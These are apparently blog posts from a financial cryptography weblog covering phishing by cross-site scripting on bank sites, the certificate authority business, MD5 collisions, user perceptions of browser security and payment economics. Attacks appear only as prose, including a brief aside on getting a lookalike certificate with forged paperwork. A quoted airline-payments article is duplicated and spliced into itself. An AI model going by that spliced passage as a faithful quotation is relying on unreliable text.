The first question is actually addressed but not answered in their real FAQ on the process.
Somewhere I saw that the end of March is the time for the report from the advisors. We haven't got long to wait to see if ICANN delivers a copybook case of open governance.
We don't often get the chance to do the Rip van Winkle experience, and this makes Christopher Allen's essay on how he returned to the security and crypto field after exiting it in 1999 quite interesting.
He identifies two things that are in common: Fear and Gadgets. Both are still present in buckets, and this is a worry, says Christopher. On Fear:
"To simplify, as long as the risks were unknown, we were in a business feeding off of 'fear' and our security industry 'pie' was growing. But as we and our customers both understand the risks better, and as we get better at mitigating those risks cheaply, this "fear" shrinks and thus the entire 'pie' of the security industry becomes smaller. Yes, new 'threats' keep on coming: denial-of-service, worms, spam, etc., but businesses understanding of past risks make them believe that these new risks can be solved and commodified in the same way."
The observation that fear fed on the unknown risks is certainly not a surprise. But I find the conclusion that as the risks were better understood, the pie shrunk to be a real eye opener. It's certainly correlated, but it misses out a world of causality - fear is and was the pie, and now the pie buyers are jaded.
I've written elsewhere on what's wrong with the security industry, and I disagree with how Christopher's assumptions, but we both end up with the same question (and with a nod to Adam's question): how indeed to sell a viable real security product into a market where statistically, we are probably selling FUD?
Addendum: Adam's signalling thread: from Adam: 1, 2. From Iang: 1, 2
Following on from discussions on peer reviewed papers, I checked an up and coming conference (Econ & Security), and
Take a paper and blog it in some fashion. (Perhaps limit the blog entry to the abstract and a link to the full paper.) Then, open the blog entry for comments and trackbacks.
Hey presto, we have peer review but not peer gatekeeping. (So far this was all Adam's idea.) We can also include substantial milestones such as major review periods, closing off one blog entry and shifting to another when the author has enough material to rewrite.
Reputation is built in as over time, the volume of attention should indicate the importance of the work. Let's draw a line in the sand and say that papers should be licensed under a Creative Commons licence.
Now, blogs already do this. But they are spontaneous, free flowing and full of spelling errors. So in order to turn the blog more to a weighty forum suited to the gravity of academia, we could put some links on the blog front page indicating the papers under spotlight.
Has anyone got an FC paper ready to roll? As Digital Money and FC-conference have just passed, and Econ&Security is closed, there seems to be a bit of a hole for the next 6 months in the peer review process. I would point out that the workshop in Electronic Contracting is open for another month. Oops, no, it's closed too. Double-oops. It's cancelled for lack of critical mass! Well, that just goes to show how hard the conference game is - having been there myself.
Having said that, in general, most of these conferences presume that Internet discussion does not count as publication. So you can have the best of both worlds, you can take advantage of a blog peer-review forum to hone your argument, then go for old world dead tree publication as well. (As long as you are careful not to muck up the licensing...)
fm points at developments in the anti-phishing battle (extracted below) only unexpected if you had not an earlier entry on the Crooked Black Claw.
It seems that Netcraft are having some success in aggregating the information collected from their toolbar community into an early warning sign of where phishers are heading. Reportage from them: online banking is being attacked by cross-site scripting. This is distinct to the traditional phishing in that it does now bring the bank and ecommerce site (note to Niham!) into the loop. Yet only in a small way; close that loophole and that puts the bank out of the defence business again.
Yet more importantly is the structural shift that is being signalled here.
Netcraft pushed out their toolbar back in the closing days of 2004. Now they have can use this info, a scant 10 weeks later. This changes the balance of power in cert-based security, and CAs will be further be marginalised by this development. Here's the article followed by more observations:
Online Banking Industry Very Vulnerable to Cross-Site Scripting FraudsPhishing Attacks reported by members of the Netcraft Toolbar
community show that many large banks are neglecting to take
sufficient care with the development and testing of their online
banking facilities.Well known banks have created an infestation of application bugs and
vulnerabilities across the Internet, allowing fraudsters to insert
their data collection forms into bona fide banking sites, creating
convincing frauds that are undetectable to most customers. Indeed, a
personal finance journalist writing for The Motley Fool was brave
enough to publicly admit to having fallen for a fraud running on
Suntrust's site and having her current account cleaned out. It's a
reasonable premise that if a Motley Fool journalist can fall for a
fraud, anyone can.One fraud recently blocked by the Netcraft Toolbar was at Citizens
Bank. Fraudsters composed and mass mailed a phishing mail which
exploited a program on CitizensBank.com, loading Javascript from the
attackers' server hosted at Telecom Italia. Customers were presented
with a page bearing the CitizensBank.com URL in the address bar,
while the browser window displays a form from the Telecom Italia
server asking for user login information.The script being exploited allows visitors to search for Citizens
Bank branch offices in their town. Along with search scripts, branch
locator pages are frequently carelessly coded and are targets for
fraudsters who are actively analyzing financial web sites for
weaknesses.
Another thought occurred to me. I wrote last night in Mozilla's bug fix forum "There is no centralised database of certs by which a CA can know whether an application for a new cert is likely to conflict (paraphrased)." This is because CAs do not cooperate and will never cooperate at that level (as customer theft will be the obvious result).
This balkanisation of CAs means that any security fixups must align with those borders. An attack on an ecommerce site using certs will come via another CA. If I was to attack GMail, I wouldn't go to Equifax for my cert, I'd go to Comodo. Or VeriSign, or some other... (And yes, I'd ask for GMall.com and present my forged paperwork for that company. But let's skip over the boring details of how we trick a CA.)
So it is crucial that the browser shows which CA signed the cert. Along with other things as suggested here by Peter Gutmann, in a discussion on how to detect and discriminate rogue CAs, a priori:
In other words, this problem [of differentiating between "high" assurance and "low" assurance] is way, way up in the political layer, and I can't see any way of resolving it. It'd certainly be a good idea to make some distinction, but it's not a productive area to apply effort. It'd be better to look at some of the work on secure UI design (e.g. anything by Ka-Ping Yee, Simpson Garfinkel's thesis, etc etc). Work on the stuff that's solveable and leave this one as a honeynet for the bureaucrats to prevent them from causing any damage elsewhere.Two other bits that I should mention:
- Make Herzberg et al's TrustBar a default, built-in part of the browser.
- Go to http://www.gerv.net/security/a-plan-for-scams/ and implement the entire list.
That will do more for security than any certificate-nitpicking ever will (the anti-phishing list at Gerv's site should be adopted as the #1 - #5 security features to be added to Mozilla/Firefox). After you've implemented those, you can still work on the titanium-plated kryptonite certificate support. Conversely, no amount of diamond-studded iridium certificates will do you any good without anti-phishing/spoofing measures like the above being used.
Peter.
If there is a God of Cryptoplumbing, then Peter Gutmann is he, and he has spoken. We now seem to be on our way to a manifesto of ideas. Perhaps we should take that further...
Getting back to the crucial point here, I claimed there was no centralised database. But, it turns out that there is a database - the net. Sure, it ain't centralised, but (and here's the clanger) it is trawled on a daily basis for certs. By two parties at least that I know of: Netcraft and SecuritySpace. And as a consequence both of these parties have (implied) centralised databases, and have an ability to answer the question "is this new application for a cert likely to be a phishing attack?"
Now, if you are a net technie, that will likely be a purile observation. But if you are the CEO of a Certificate Authority, then the ground just rumbled under your feet. If these two players can pull this off then the CA just got so marginalised that the commoditisation that we've seen with Comodo and GoDaddy, and also with CACert but in a different direction ... well, all that falls into the class of "you ain't seen nothing yet!"
Which leads me to my final observation. (Techie warning. What follows is all bizspeak, sorry about that.) As CAs are inevitably marginalised by the above development, and by their failure to protect the net from the arisal of phishing - a direct MITM on the browser - then the big bucks players will rethink their strategy. That of course means Verisign.
There are two possible paths here. Path One is that the branding opportunities turn up in time (watch Microsoft here) for the CA business to reverse its fortunes and become a media space player. In this scenario, players spend on advertising, and start to build their brands as quality and security (which means they take a proactive approach to watching applications for certs). But they can only do this if a) the branding turns up, b) they can get more investment, and thus c) they can show a massive market increase and thus d) the commody certificate leads to a discriminated market place of much greater size.
That's not as far off as we think, as part a) also leads to part d) in market terms.
Then there is Path Two. Phishing gets bigger, and some poor Alice in the US loses her house over it. Her attornies say "this can't go on and we can help you stop it!" (Proving that the USA leads in genetic engineering, their attornies lack any capability to say "I don't know / I can't help you.")
Boom, class action suit on phishing is filed against the bank, the browser manufacturer, the cert suppliers (both, or all) and to cap things off, the people who designed the system. The potential class size is about 1 million americans, give or take. Total losses are in billions, over a few years. Add punitive damages if it goes badly, and the case showed that the architects should have known better.
Potential payout is from 100m to 10b, depending. So it is big enough to encourage salivation, but it's also big enough to break any but the bank players (who themselves are just victims so they aren't likely to lie down and die) and Microsoft.
Now, cast all these ingredients into the pot and what do you have? The cards just got totally reshuffled on the CA business. Which means that the biggest player, Verisign, will have the biggest problem. This is compounded (should I say exponentiated?) by several issues:
Against that we have an uncertain and never fully monetarised synergy from certs, domains, NetDiscovery and lots of other "strategic control" businesses under the umbrella.
To me, this says one thing: Verisign will sell the CA business. They will do it to limit the damages from future litigation, and because the ground is shifting too fast for their complex business to benefit from. Further, CAs as "strategic controls" are being marginalised. It's no longer core, and it's darn risky.
That's my call! Analysts charge top dollar for this - what's your bet?
Hyperion's Digital Money Forum is on, Wednesday and Thursday. Dave Birch runs an engaging show for financial cryptographers, and well worth the 2 days if you can get to London. At £275, it doesn't break the bank.
(I guess they'll take late bookings.) The schedule is on the site, but it is in PDF.
Wang and Yu have released their draft paper(s) for Eurocrypt 2005:
Xiaoyun Wang and Hongbo Yu, "How to Break MD5 and Other Hash Functions"
Xiaoyun Wang and Hongbo Yu, "Cryptanalysis of the Hash Functions MD4 and RIPEMD"
Meanwhile, Vlastimil Klima has released a draft on his research trying to reverse engineer the Shandong team's results. Whereas the Shandong team managed MD5 collisions in one hour on their IBM P690 supercomputer, Klima claims he can do a collision, using different techniques, in only 8 hours on his 1.6GHz laptop!
V. Klima, Finding MD5 Collisions - a Toy For a Notebook
And, expect this to improve, Klima says, when the two differing techniques are compared and combined.
What does this mean, especially considering my earlier post on cryptographer's responsibility?
It is now easy to find a junk document that matches some MD5 hashed document. This is a collision attack. But, it will be harder to find a valid attacking document that hashs to the same MD5. This is called a pre-image attack, and is far more serious.
Further it remains harder to breach a protocol that relies on other things. But, do move from MD5 with due haste, as if collisions are easy to find, then pre-images can't be that far behind. And once we have pre-images, we can substitute in real live key pairs into the certs attack described earlier today.
A security model generally includes the human in the loop; totally automated security models are generally disruptable. As we move into our new era of persistent attacks on web browsers, research on human failure is very useful. Ping points to two papers done around 2001 on what web bowsing security means to users.
Users Conceptions of Web Security (by Friedman, Hurley, Howe, Felten, Nissenbaum) explored how users treat the browser's security display. Unsurprisingly, non-technical users showed poor recognition of spoof pages, based on the presence of a false padlock/key icon. Perhaps more surprisingly, users derived a different view of security: they interpreted security as meaning it was safe to put their information in. Worse, they tended to derive this information as much from the padlock as from the presence of a form:
"That at least has the indication of a secure connection; I mean, it's obviously asking for a social security number and a password."
Which is clearly wrong. But consider the distance between what is correct - the web security model protects the information on the wire - and what it is that is relevant to the user. For the user, they want to keep their information safe from harm, any harm, and they will assume that any signal sent will be to that end.
But as the threat to information is almost entirely at the end node, and not on the wire, users are faced with an odd choice: interpret the signal according to the harms that they know about, which is wrong, or ignoring the signal because it is irrelevent to the harms. Which is unexpected.
It is therefore understandable that users misinterpret the signals they are given.
The second paper, User's Conceptions of Risks and Harms on the Web(by Friedman, Nissenbaum, Hurley, Howe, Felten) is also worth reading, but it was conducted in a period of relative peace. It would be very interesting to see the same study conducted again, now that we are in a state of perpetual attack.
I see signs of a wave of FUD spreading through the net as cryptoplumbers try and interpret the latest paper on MD5 collisions in certs from Lenstra, Wang, Weger. I didn't have time to read the paper at the time, and wasn't easily able to divine from the chit chat what the result meant. When the dust settled, this was not an attack, but many assumed it was.
Why? Because it wasn't explained, neither in the paper nor anywhere else that I read. Reading the paper, the closest I came to a limitation on damage in human language was this:
``The RSA moduli are secure in the sense that they are built up from two large primes. Due to our construction these primes have rather different sizes, but since the smallest still are around 512 bits in size while the moduli have 2048 bits, this does not constitute a realistic vulnerability, as far as we know.''
The last part (my emphasis) may seem pretty clear, but the reasoning behind it is inaccessible to non-cryptographers. Further, it is buried deep: the key phrase is not in the abstract or conclusion, nor on the more accessible HTML page.
Now, in all probability, the authors may be surprised to know that non-cryptographers read these papers. That's because normally most of the output from cryptology is not of importance to the outside world - small improvements and small suggestions. And, frankly, it's economic for us all to let the people doing to work get on and do it without the distraction of the real world.
This time is different however. The Wang, Yin, Yu results go beyond the limited world of cryptography as they have shifted the security statement of a large class of algorithms in which we previously trusted and relied upon. This time we are all effected, and those who understand have a responsibility to explain what the real significance of the results is.
Here is my own limited interpretation:
The paper describes how to create a false or forged certificate based on MD5. But what it does not seem to say is that the key within the certificate can be forged, neither in private key form nor in useful public key form (on this last point I am not sure).Without the private key, the certificate cannot take place in a normal signature protocol. That's the point of the public key: to prove that the other party has control of the private key.
Which means no attack, as yet, in general. Yes, we should with all due speed deprecate MD5 in the production of certificates, but we are a long way from seeing the situation turn into an economic attack.
Addendum:But it looks like I got it wrong in detail. See cypherpunk's comment below, which explains how it is. We do concur on results though - no attack.
So where's the danger? People on the net are drawing out the unexplained results and assuming that things are totally broken. And that crosses the line into FUD.
It may be that encouraging a sense of Fear, Uncertainty and Doubt will help the Internet run like scared lemmings away from the now weakened MD5 hash. It may help build emphasis towards what we need - a serious effort to construct a new theory of message digest functions along the lines of NIST's AES competition.
But, more than likely, FUD will do what it has always done: spread confusion and cause people to make bad decisions. And, as those bad decisions are often made in the direction of the spreaders of FUD, we must understand that there is a financial benefit to those spreading FUD. More sales, more exposure.
This is not responsible behaviour. Now, to be clear, the primary authors of this paper are focused on the result, and we understand that distractions of dotting the i's and crossing the t's will slow down the real work. But those of us who are not involved in the creation of the new result have a duty to explain and teach, rather than steal the limelight.
Cryptographers as scientists and wider security specialists as advisers have a duty to deliver value in terms of security, not sales. We all have to be on the watch for the tempation to use FUD as the easy way for sales. In the long run, spreading FUD and reaping easy sales results in a mess that we as the security community have to clean up.
Worse, it spreads the doubt that cryptography and security as a science and specialisation is not worth listening to, because whatever we say next time has to fight the failure of last time. Selling FUD now means we are damned for all time to sell snake oil forever.
Stefan writes:
"Back in 1996–1998, I worked in my spare time on a book titled Electronic Money and Privacy. Due to career priorities from 1999 onward, I never got around to finishing the book alas. Since I will not have any time in the foreseeable future to get back to working on the book, I am hereby making the first four draft chapters freely available."
My own story is similar. Back in 97 or so I started a book with a working title of FC. In 98 I rewrote it along the lines of the then evolving 7 layer model of financial cryptography. Unfortunately I did not get the time to wrap the book up, and it remains somewhat incomplete.
Perhaps I should put it on the net. I recently put all my draft papers up on the net, as some are a year or more old and aren't getting closer! Comments? Maybe there is too much stuff on the net already ...
In the ongoing thread of Adam's question - how do we signal good security - it's important to also list signals of bad security. CoCo writes that Tegam, a French anti-virus maker, has secured a conviction against a security researcher for reverse engineering and publishing weaknesses.
This seems to be a signal that Tegam has bad security. If they had good security, then why would they care what a security researcher said? They could just show him to be wrong. Or fix it.
There are two other possibilities. Firstly, Tegam has bad security, and they know it. This is the most likely, and their aggressive focus on preserving the revenue base would perhaps lead them to prefer suppression of future researches into the product. CoCo points to a claim that Tegam accused the researcher of being a terrorist in a French advertisement, which indicates an attempt to disguise the suppression and validate it in the minds of their buying public. In French and google translates to quixotic english. Tegam responds that this article makes their case, but comments by flacks do no such thing. However the response makes for interesting reading and may balance their case.
Alternatively (secondly) they just don't know. And, I don't think we need to show the proof of "don't know" is equivalent to "insecure."
CoCo also comments on how the chilling effect will raise insecurity in general. But if enough companies decline to pursue avenues of prosecution, this might balance out in our favour: we might then end up with a new signal of those that prosecute and those that do not.
Texas Instruments recently signalled desire for good security in the RFID breach, as well as an understanding of the risks to the user. Tegam has signalled the reverse. Are they saying that their product has known weaknesses, and they wish to hide these from the users? You be the judge, and while you're at it, ponder on which side of this fence your own company sits?
FCers will recognise the confusion in this article by Kevin Kelleher about how to analyse eBay + Paypal:
"Here's a little-known fact about eBay (EBAY:Nasdaq) : It's not one of the most successful e-commerce companies in the world.It's actually two of the most successful e-commerce companies in the world -- eBay, the global network of auction and retail sites, and PayPal, its online-payment technology subsidiary that fuels the bulk of eBay transactions. Of the two, PayPal may emerge as the bigger phenomenon in the long run."
FCers see further than trying to model a payment system as a bank; it is a financial cryptography system that happens to have branded its Value structure. The Finance component is the auction, and the fact that the two companies grew up apart and together is simple reflection of the FC observation that you need both the finance and the value.
Jim points at this article by Ivan Schneider on the attempts of airlines to reduce payment cost.
Airlines Aim for Expense Reduction in Payments
...
After labor and fuel, the passenger airline industry's largest expenses involve distribution costs. These are comprised of travel agency commissions, fees to global distribution systems such as Sabre and finally, the merchant discount rate paid to their banks.
Already, the airlines have effectively slashed their distribution costs through hard negotiations with travel agencies and the global distribution systems, yielding a 26 percent decrease in average annual distribution costs from 1999 to 2002, according to Edgar, Dunn & Company (EDC, Atlanta), a financial-services and payments consultancy.
Now, the airlines are targeting the estimated $1.5 billion it spends on accepting credit cards from its customers. "The airlines definitely have payments on their radar screens," says Pascal Burg, a San Francisco-based director at EDC. Airlines Aim for Expense Reduction in Payments
...
After labor and fuel, the passenger airline industry's largest expenses involve distribution costs. These are comprised of travel agency commissions, fees to global distribution systems such as Sabre and finally, the merchant discount rate paid to their banks.
Already, the airlines have effectively slashed their distribution costs through hard negotiations with travel agencies and the global distribution systems, yielding a 26 percent decrease in average annual distribution costs from 1999 to 2002, according to Edgar, Dunn & Company (EDC, Atlanta), a financial-services and payments consultancy.
Now, the airlines are targeting the estimated $1.5 billion it spends on accepting credit cards from its customers. "The airlines definitely have payments on their radar screens," says Pascal Burg, a San Francisco-based director at EDC. "They used to look at accepting cards and paying merchant fees as the cost of doing business, and now they're trying to proactively manage the cost associated with doing payments."
The first approach is for an airline to have a friendly chat with its affinity card co-brand partner. But that's often a difficult conversation to have, both for the bank and for the airline. "Traditionally, the co-brand relationships have been managed in the marketing department, while the acquiring merchant side has been handled through the corporate treasury," says Thad Peterson, also a director at EDC.
...
http://www.banktech.com/news/showArticle.jhtml?articleID=60401062"They used to look at accepting cards and paying merchant fees as the cost of doing business, and now they're trying to proactively manage the cost associated with doing payments."
The first approach is for an airline to have a friendly chat with its affinity card co-brand partner. But that's often a difficult conversation to have, both for the bank and for the airline. "Traditionally, the co-brand relationships have been managed in the marketing department, while the acquiring merchant side has been handled through the corporate treasury," says Thad Peterson, also a director at EDC.
...
http://www.banktech.com/news/showArticle.jhtml?articleID=60401062
Vince Cate (writes Ray Hirschfeld) created a stir a number of years ago by relocating to the Caribbean island nation of Anguilla, purchasing a Mozambique passport-of-convenience, and renouncing his US citizenship in the name of cryptographic and tax freedom.
Last Thursday I attended a ceremony (the first of its kind in Anguilla) at which he received his certificate of British citizenship.
But Vince's solemn affirmation of allegiance to Queen Elizabeth, her heirs and successors was done for practical rather than ideological reasons. Since giving up his citizenship, the US has refused to grant him a visa to visit his family there, or even to accompany his wife to St. Thomas for her recent kidney surgery. Now as a British citizen he expects to qualify for the US visa waiver program.
Is this the end of an era, a defining cypherpunk moment?
Hop on a plane, land, and discover Adam has posted 13 blog entries, including one that asks for more topics! Congrats on 500 posts! He posts on some testimony: " the only part of our national security apparatus that actually prevented casualties on 9/11 was the citizenry." More on security measurements ("fundamentally flawed"). Tons or stuff on Choicepoint.
Axel talks about what it means to be a security professional. Yes, there are some media stars out there, but remember "don't believe Vendor pitches." Sounds like something I would write.
Scott points at an article on the inside story of how plastic payments are battled over in Australia. Sadly, the article requires yet another subscription to yet another newspaper that you only read once and they have your data for ever. No thanks.
Stefan does some critical analysis of psuedonyms; very welcome, there is an absence of good stuff on this. A must read for me, so remind me please... Meanwhile, he comments that laws won't help identity theft, but "Schwarzenegger’s administration ... should point legal fingers ... at organizations that hold, distribute, and make consumer-impacting decisions based on identity information..." It is correct to recognise that the problem lies fundamentally with using the identity as the "hitching post" for animals in the future, but finger pointing isn't going to help. (It's a case of the One True Number.) More on that later, when I've got my draft expose on finger pointing in reasonable shape.
In terms of definitions for FC, applying crypto to banking and finance doesn't work. Mostly because those doors are simply closed to us, but also because that's simply not how it is done. And this brings us to the big difference between Bob's view and FC7.
In Bob's view, we use crypto on anything that's important. Valuable - which is much more open than, say, the 'bank' view. But this is still bottom-up thinking and it is in the implicit assumption of crypto that the trouble lies.
Applications are driven top down. That means, we start from the application, develop its requirements and then construct the application by looking downwards to successively more detailed and more technical layers. Of course, we bounce up and down and around all the time, but the core process is tied to the application, and its proxy, the requirements. The requirements drive downwards, and the APIs drive upwards.
Which means that the application drives the crypto, not the other way around. Hence it follows that FC might include some crypto, or it might not - it all depends on the app! In contrast, if we assume crypto from the beginning, we're building inventions looking for a market, not solving real world problems.
This is at heart one of the major design failures in many systems. For example, PKI/SSL/HTTPS assumed crypto, and assumed the crypto had to be perfect. Now we've got phishing - thanks guys. DigiCash is the same: start from an admittedly wonderful formula, and build a money system around it. Conventional and accepted systems building practices have it that this methodology won't work, and it didn't for DigiCash. Another example is digital signatures. Are we seeing the pattern here? Assume we are using digital signatures. Further assume they have to be the same as pen&ink signatures.... Build a system out of that! Oops.
Any systems methodology keeps an open mind on the technologies used, and that's how it is with FC7. Unlike the other definitions, it doesn't apply crypto, it starts with the application - which we call the finance layer - and then drives down. Because we *include* crypto as the last layer, and because we like crypto and know it very well, chances are there'll be a good component of it. But don't stake your rep on that; if we can get away with just using a grab bag of big random numbers, why wouldn't we?
And this is where FC7 differs from Bob H's view. The process remains security-oriented in nature. The people doing it are all steeped in crypto, we all love to add in more crypto if we can possibly justify it. But the goal we drive for is the goal of an application and our solution is fundamentally measured on meeting that goal; Indeed, elegance is not found in sexy formulas, but in how little crypto is included to meet that goal, and how precisely it is placed.
The good news about FC7 is it is a darn sight more powerful than either the 'important' view, and a darn sight more interesting than the banking view. You can build anything this way - just start with an 'important' application (using Bob's term) and lay our your requirements. Then build down.
Try it - it's fun. There's nothing more satisfying than starting with a great financially motivated idea, and then building it down through the layers until you have a cohesive, end-to-end financial cryptography architecture. It's so much fun I really shouldn't share it!